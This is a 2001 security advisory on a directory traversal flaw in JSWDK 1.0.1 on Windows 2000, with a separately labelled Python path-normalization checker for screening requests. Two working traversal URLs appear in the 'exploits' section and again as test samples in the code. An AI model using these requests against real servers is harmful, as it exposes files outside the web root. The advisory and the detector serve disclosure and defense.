CHINANSL Security Advisory (CSA-200106)

2001-03-29T00:00:00
ID SECURITYVULNS:DOC:1439
Type securityvulns
Reporter Securityvulns
Modified 2001-03-29T00:00:00

Description

Topic: JavaServer Web Dev Kit (JSWDK) 1.0.1 for Win2000 Directory Traversal Vulnerability

vulnerable: Microsoft Win2000 + JSWDK 1.0.1; other operating systems may also be affected.

discussion: A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed. The vulnerability allows remote attackers to access files outside the document root directory.

exploits: http://localhost:8080/examples//WEB-INF/ lists the /WEB-INF/ directory.

http://localhost:8080/../examples//WEB-INF/../../../../../ lists all files and directories in c:\ if JSWDK is installed in c:\.

solution: Update JSWDK
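
For administrators who want to screen requests or review access logs for the two request forms above, the following is an added example, not part of the CHINANSL advisory and not JSWDK code. It reduces a request path to clean segments before checking it, so the doubled slash and the `..` segments are resolved first; the function name `check_request_path` and the benign sample path are assumptions made for illustration.

```python
from urllib.parse import unquote, urlsplit

# Directory the advisory shows being listed; the Servlet specification
# says its contents are not served to clients. Compared in lower case.
PROTECTED = {"web-inf"}

def check_request_path(target):
    """Return (allowed, detail) for an absolute URL or a request path.

    The path is reduced to clean segments first and checked afterwards,
    so '//' and '..' cannot slip past a plain string-prefix comparison.
    """
    # urlsplit would misread a leading '//' as a host, so only use it on URLs.
    path = target if target.startswith("/") else urlsplit(target).path
    path = unquote(path.split("?", 1)[0])   # drop query, decode %xx once
    path = path.replace("\\", "/")          # Windows also accepts '\'
    if "\x00" in path:
        return False, "NUL byte in path"
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):                # '' comes from a doubled slash
            continue
        if seg == "..":
            if not segments:                # would climb above the root
                return False, "escapes document root"
            segments.pop()
            continue
        segments.append(seg)
    for seg in segments:
        # Win32 ignores trailing dots/spaces and letter case in file names.
        if seg.rstrip(". ").lower() in PROTECTED:
            return False, "protected directory: " + seg
    return True, "/" + "/".join(segments)

# The two request forms from the advisory plus one constructed benign path.
SAMPLES = [
    "http://localhost:8080/examples//WEB-INF/",
    "http://localhost:8080/../examples//WEB-INF/../../../../../",
    "/examples/jsp/index.html",  # constructed sample
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", check_request_path(sample))
```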

Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use.

CHINANSL Security Team <lovehacker@chinansl.com> CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)